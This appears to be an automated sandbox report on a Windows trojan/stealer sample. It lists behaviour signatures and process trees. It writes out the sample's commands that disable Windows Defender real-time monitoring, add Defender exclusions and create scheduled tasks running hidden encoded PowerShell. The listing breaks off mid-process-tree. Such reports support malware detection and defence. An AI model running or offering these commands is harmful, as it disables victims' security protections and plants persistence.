Malware Analysis Report

2025-08-10 23:15

Sample ID 221031-1zgzjaedek
Target file.exe
SHA256 7c74576432c1d96de5ab6f00f0027b2e4565743dc1362423e5370a5fc56ee191
Tags
evasion trojan discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7c74576432c1d96de5ab6f00f0027b2e4565743dc1362423e5370a5fc56ee191

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

evasion trojan discovery spyware stealer

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Checks BIOS information in registry

Loads dropped DLL

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-10-31 22:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:07

Platform

win7-20220901-en

Max time kernel

150s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEhzvxrPb" /SC once /ST 09:41:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEhzvxrPb"

C:\Windows\system32\taskeng.exe

taskeng.exe {9A6228B2-40B6-4D89-A88A-102951D5FBBE} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEhzvxrPb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 22:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe\" KP /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {1B3DA9EC-DE32-43E4-AFF8-296227E6196C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gLdoXkBXq" /SC once /ST 17:46:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gLdoXkBXq"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gLdoXkBXq"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPZLeWFxT" /SC once /ST 01:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPZLeWFxT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

